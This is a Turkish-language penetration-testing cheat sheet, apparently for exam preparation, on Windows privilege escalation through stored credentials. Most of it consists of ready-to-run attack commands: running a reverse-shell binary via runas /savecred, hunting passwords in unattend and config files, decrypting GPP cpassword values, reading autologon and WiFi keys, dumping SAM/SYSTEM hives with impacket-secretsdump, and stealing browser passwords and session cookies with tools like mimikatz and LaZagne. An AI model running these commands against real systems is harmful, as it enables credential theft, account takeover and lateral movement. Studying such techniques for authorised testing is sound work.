PrivEsc ✓ EXAM-SAFE orta

Saklanan Kimlik Bilgileri — cmdkey, Unattend, GPP, Credential Manager, SAM

Windows sistemleri unattend.xml/sysprep, Group Policy Preferences cpassword, Credential Manager, cmdkey kayitlari, kayitli PuTTY/WinSCP/RDP/WiFi profilleri, registry autologon ve SAM/SYSTEM kovanlarinda parolalar saklayabilir. Bu kaynaklar taranarak ayricalikli hesaplara gecis yapilir.

ÖN KOŞULLAR

Dusuk yetkili shell
Dosya sistemi/registry okuma erisimi
SAM dump icin SYSTEM/yedek ayricaliklari (SeBackup) gerekebilir

┌──

Komutlar

cmd ✓ EXAM-SAFE user

cmdkey /list

Kaydedilmis kimlik bilgilerini listele; /savecred ile runas hedeflerini bul HackTricks — Windows Local Privilege Escalation (Stored Credentials)

cmd ✓ EXAM-SAFE user

runas /savecred /user:ADMIN_USER "C:\Windows\Temp\rev.exe"

cmdkey'de kayitli parola ile o kullanici olarak komut calistir (parola gerekmez) HackTricks — Windows Local Privilege Escalation

powershell ✓ EXAM-SAFE user

Get-ChildItem C:\ -Include unattend.xml,sysprep.xml,sysprep.inf,Autounattend.xml,Unattended.xml -File -Recurse -EA SilentlyContinue

Unattended kurulum dosyalarini ara (icinde Base64 parola olabilir) HackTricks — Windows Local Privilege Escalation (unattend)

powershell ✓ EXAM-SAFE user

findstr /si password *.xml *.ini *.config *.txt 2>nul

Disk uzerinde 'password' iceren konfig dosyalarini tara HackTricks — Windows Local Privilege Escalation

cmd ✓ EXAM-SAFE user

findstr /s /i cpassword \\{{DOMAIN}}\sysvol\{{DOMAIN}}\policies\*.xml

SYSVOL'da Group Policy Preferences cpassword (Groups.xml vb.) ara HackTricks — Active Directory (GPP cpassword)

netexec ✓ EXAM-SAFE user

netexec smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_password

Uzaktan GPP cpassword'lerini cek ve otomatik decrypt et NetExec Wiki — gpp_password module

gpp-decrypt ✓ EXAM-SAFE

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

Bulunan cpassword Base64'unu AES sabit anahtariyla cozup acik parola al HackTricks — Active Directory (GPP cpassword)

cmd ✓ EXAM-SAFE user

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Registry autologon — Winlogon DefaultPassword acik parolasini ara HackTricks — Windows Local Privilege Escalation (Autologon)

cmd ✓ EXAM-SAFE user

netsh wlan show profile name="SSID" key=clear

Kayitli WiFi profilinin acik parolasini goster HackTricks — Windows Local Privilege Escalation

reg ✓ EXAM-SAFE admin

reg save HKLM\SAM C:\Windows\Temp\sam.save && reg save HKLM\SYSTEM C:\Windows\Temp\system.save

SAM ve SYSTEM kovanlarini diske kaydet (SeBackupPrivilege/admin gerekir) HackTricks — Dumping SAM/SYSTEM

impacket-secretsdump ✓ EXAM-SAFE

impacket-secretsdump -sam sam.save -system system.save LOCAL

Kali'de offline SAM dump; lokal kullanici NTLM hash'lerini cikar WADComs — impacket-secretsdump

impacket-secretsdump ✓ EXAM-SAFE admin

impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}

Uzaktan SAM/LSA/cached creds dump (admin kimlik bilgisiyle) WADComs — impacket-secretsdump

Genel Bakis

Windows ortamlarinda parolalar pek cok yerde saklanir ve cogu zaman dusuk yetkili bir kullanicidan okunabilir. Bu sayfa tek tek tum saklanan kimlik bilgisi kaynaklarini ve bunlardan yatay/dikey gecis yontemlerini kapsar.

cmdkey + runas /savecred

cmdkey /list Credential Manager’da kayitli kimlik bilgilerini gosterir. Cikitida Domain:target=... ve bir kullanici adi gorursek, parolayi bilmeden runas /savecred /user:HEDEF ile o kullanici olarak komut calistirabiliriz. Bu en hizli ve sessiz yontemlerden biridir.

Unattended / Sysprep

Kurulum otomasyonu icin kullanilan unattend.xml, Autounattend.xml, sysprep.inf dosyalari Panther, Sysprep veya disk kokunde kalir. <Password> alani genelde Base64 kodludur (sifreleme degil) — echo <b64> | base64 -d ile cozulur.

Group Policy Preferences (cpassword)

GPP ile dagitilan yerel hesap parolalari SYSVOL’daki XML dosyalarinda cpassword olarak saklanir. Microsoft AES anahtarini public olarak yayinladi, bu yuzden gpp-decrypt ile aninda cozulur. Domain kullanicisiyla SYSVOL okunabildigi icin bu klasik bir AD privesc’tir; netexec ... -M gpp_password ile uzaktan otomatize edilebilir.

Credential Manager / Kayitli Uygulamalar

PuTTY: reg query HKCU\Software\SimonTatham\PuTTY\Sessions — proxy parolasi acik olabilir.
WinSCP: HKCU\Software\Martin Prikryl\WinSCP 2\Sessions — sifrelenmis ama tersinir; winscppasswd ile cozulur.
RDP: kaydedilmis .rdp ve Credential Manager DPAPI bloblari (mimikatz dpapi::).
WiFi: netsh wlan show profile ... key=clear.

Registry Autologon

Winlogon altinda DefaultUserName + DefaultPassword acik metin olarak durabilir (bkz. win-autologon).

SAM / SYSTEM

Admin veya SeBackupPrivilege varsa SAM ve SYSTEM kovanlari reg save ile alinip Kali’de impacket-secretsdump -sam ... -system ... LOCAL ile offline crack’lenir; cikan NTLM hash’leri pass-the-hash icin kullanilir. Uzaktan admin kimlik bilgisiyle dogrudan secretsdump calistirmak da mumkundur.

Tarayici & Oturum (admin GEREKMEZ — kullanici context’inde loot)

Lokal admin olmadan, kullanici belleginden/diskinden kimlik bilgisi cikarilabilir:

mimikittenz — calisan process’lerin (tarayici) RAM’inden ReadProcessMemory ile acik parola/regex yakalar.
SessionGopher (Invoke-SessionGopher -Thorough) — PuTTY/WinSCP/FileZilla/RDP kayitli oturum parolalarini ve anahtarlarini toplar.
LaZagne (lazagne.exe browsers), SharpChrome/SharpDPAPI — Chrome/Edge/Firefox kayitli parola ve cookie’leri (DPAPI ile) cozer.
Cookie hirsizligi = parola olmadan oturum ele gecirme: cikan oturum cookie’sini kendi tarayicina enjekte ederek hedefin web oturumunu devral.

Notlar

Toplanan tum hash’leri hashcat/john ile WORDLIST kullanarak kirmayi deneyin; cracklenen parolalar genelde domain genelinde tekrar kullanilir (password reuse).
winPEAS ve lazagne all bu kaynaklarin cogunu tek seferde tarar — manuel kontrolden once hizli bir bakis icin idealdir.

┌──

Kaynaklar

↗ HackTricks — Windows Local Privilege Escalation (Stored/Saved Credentials)↗ HackTricks — Active Directory Methodology (GPP cpassword)↗ WADComs — impacket-secretsdumpPayloadsAllTheThings — Windows Privilege Escalation (Credentials)